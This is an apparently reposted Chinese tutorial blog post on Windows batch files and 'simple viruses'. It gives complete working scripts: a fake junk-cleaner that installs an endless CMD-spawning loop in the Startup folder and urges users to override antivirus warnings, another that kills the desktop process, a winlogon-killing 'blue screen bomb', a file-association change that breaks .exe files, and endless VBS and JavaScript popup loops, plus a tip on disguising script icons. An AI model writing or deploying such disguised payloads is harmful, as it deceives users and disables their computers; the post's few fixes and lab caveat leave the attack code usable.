【CyberSecurityLearning 28】批处理与简单病毒
批處理案例
@echo off color 0a title 飛哥小程序v1.0 :menu cls echo ========================== echo 菜單 echo 1、修改管理員密碼 echo 2、定時(shí)關(guān)機(jī) echo 3、退出本程序 echo =========================== set /p num=您的選擇是: if "%num%"=="1" goto 1 if "%num%"=="2" goto 2 if "%num%"=="3" goto 3 echo 被鬧,好好輸! pause goto menu:1 set /p u=請輸入用戶名: set /p p=請輸入新密碼: net user %u% %p% >nul echo 您的密碼已經(jīng)設(shè)置成功! pause goto menu:2 set /p time=請輸入時(shí)間: shutdown -s -t %time% set /p x=是否取消(1:是,0:否): if "%x%"=="1" shutdown -a goto menu pause:3 exit病毒
測試環(huán)境:虛擬機(jī)win2003
注:一些簡單的病毒程序請勿在真實(shí)機(jī)中測試
簡單的批處理文件一
功能:偽裝垃圾清理程序添加一個(gè)開機(jī)自啟動(dòng)項(xiàng),無限彈出CMD窗口
@echo off title 系統(tǒng)垃圾清理 color 2f echo =======若殺毒軟件惡意攔截,請選擇【允許程序的所有操作】======== echo. echo. echo :start >c:\windows\windows.bat echo start cmd>>c:\windows\windows.bat echo goto start>>c:\windows\windows.bat copy c:\windows\windows.bat "%USERPROFILE%"\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\" >nul if %errorlevel%==0 goto next errorlevel是預(yù)定義變量,為0時(shí)表示上面一條語句執(zhí)行成功,非0反之 copy c:\windows\windows.bat "%USERPROFILE%\「開始」菜單\程序\啟動(dòng)" >nul if %errorlevel%==1 goto error :next echo. echo. echo ====== 垃圾清理中,請不要關(guān)閉窗口====== echo. ping -n 5 127.0.0.1 >nul echo. echo ====== 垃圾清理完畢,共清理垃圾500M=== echo. echo. echo ====== 建議立即重啟電腦 pause goto ex:error echo. echo. echo ====== 程序運(yùn)行失敗,請使用【管理員權(quán)限】重新運(yùn)行!====== echo. pause goto ex:ex exit我們來看一下運(yùn)行效果:
運(yùn)行完成后我們可以看到在開始啟動(dòng)項(xiàng)中多了一個(gè)windows.bat文件。
?
重啟之后,電腦完全死機(jī)了。
?
簡單的批處理文件二
功能:偽裝垃圾清理程序強(qiáng)制終止桌面進(jìn)程
@echo off title 系統(tǒng)垃圾清理 color 2f echo ====== 若有殺毒軟件惡意攔截,請選擇【允許程序的所有操作】===== echo. echo.:next echo. echo. echo ====== 垃圾清理中,請不要關(guān)閉窗口======= echo. ping -n 5 127.0.0.1 >nul taskkill /im explorer.exe /f >nul 2>nul echo. echo. ===== 完了,你系統(tǒng)廢了====== ping -n 5 127.0.0.1>nul echo. start c:\windows\explorer.exe echo. echo ====== 已經(jīng)修復(fù)好了!是不是嚇壞了!!嘿嘿========= pause桌面進(jìn)程被殺死!
?
?桌面進(jìn)程恢復(fù):
?最簡單的藍(lán)屏炸彈文件
ntsd -c q -pn winlogon.ex分析:
ntsd? ? ? ?#殺死進(jìn)程?
ntsd -c q -pn 進(jìn)程名? ? ?#強(qiáng)制殺死進(jìn)程
藍(lán)屏原因:winlogon 進(jìn)程不能被殺死,我想強(qiáng)制殺死,系統(tǒng)不讓,結(jié)果導(dǎo)致藍(lán)屏!
對win2003有很大的殺傷力,但對win2008基本沒有殺傷力
最簡單的病毒
assoc.exe=txtfile分析:修改文件關(guān)聯(lián),導(dǎo)致文件無法正常打開
?測試效果:
? ? ? ? ? ? ? ? ? ? ? ? ? ?
最簡單的病毒解藥
assoc.exe=exefile?只需將文件后綴與其關(guān)聯(lián)文對應(yīng)即可
?
最簡單的腳本
方法:將.txt改為.vbs
msgbox "我最帥!"?測試效果:
? ? ? ? ? ? ? ? ? ? ? ? ? ?
最簡單的死循環(huán)腳本
domsgbox "我最帥!" 英文引號loop?測試:??
?? ? ? ?
?效果:窗口無法關(guān)閉
解決方法:
vbs 使用微軟自帶的wscript.exe來編寫的
一個(gè)有趣的小腳本,大家可以試試
do msgbox "飛哥最帥!" msgbox "小子,你對這件事有異議嗎" msgbox "你要為此付出代價(jià)" msgbox "從現(xiàn)在開始我要求你點(diǎn)100下鼠標(biāo)" msgbox "100" msgbox "99" msgbox "98" msgbox "97" msgbox "96" msgbox "95" msgbox "94" msgbox "93" msgbox "92" msgbox "91" msgbox "90" msgbox "...." msgbox "3" msgbox "2" msgbox "1" msgbox "如果你看到這里,說明你確實(shí)很執(zhí)著,你感動(dòng)了我,請?jiān)冱c(diǎn)一下" msgbox "年輕人,有時(shí)候執(zhí)著也沒用,換個(gè)姿勢再來一次" loop注:可以用修改圖標(biāo)軟件修改vbs文件圖標(biāo)
?整人網(wǎng)頁
<!DOCTYPE html> <html> <head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>很惡心的常見整人效果的代碼</title> </head> <body><a href="" onmouseover="alert('為什么把鼠標(biāo)放到這里?'); alert('我不是說過不可用這樣嘛'); alert('飛哥現(xiàn)在真的很生氣'); alert('一點(diǎn)也不給飛哥面子'); alert('你把飛哥的話當(dāng)什么了'); alert('你知道錯(cuò)了嗎?'); alert('什么?你居然...'); alert('寫封信給我說對不起吧!'); alert('你能這么做我很欣慰!!!');">不許把鼠標(biāo)移到這里!</a>點(diǎn)了真爽!!! </body> </html>參考:https://blog.csdn.net/weixin_43252204/article/details/105389619
?
?
?
?
總結(jié)
以上是生活随笔為你收集整理的【CyberSecurityLearning 28】批处理与简单病毒的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【2016年第6期】面向国际的生命组学大
- 下一篇: 第四届大数据科学与工程国际会议(2019